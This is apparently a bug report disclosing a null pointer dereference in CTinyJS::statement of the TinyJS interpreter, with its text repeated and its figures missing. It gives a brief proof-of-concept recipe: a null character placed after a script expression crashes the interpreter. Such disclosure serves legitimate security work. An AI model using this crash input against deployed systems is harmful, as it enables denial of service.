There is a problem with CTinyJS :: statement. In the TinyJS.cpp + 2042 line, the pointer reference is wrong, as shown in the figure:
When the object link was obtained from the base function, the null pointer was not checked, which caused the null pointer reference and triggered a crash.
PoC construction
Add a null character after the expression in the js script:
In the picture, "j = 0;" is the empty character.
Enviroment
poc:
vulnerability description:
There is a problem with CTinyJS :: statement. In the TinyJS.cpp + 2042 line, the pointer reference is wrong, as shown in the figure: When the object link was obtained from the base function, the null pointer was not checked, which caused the null pointer reference and triggered a crash.
PoC construction
Add a null character after the expression in the js script: In the picture, "j = 0;" is the empty character.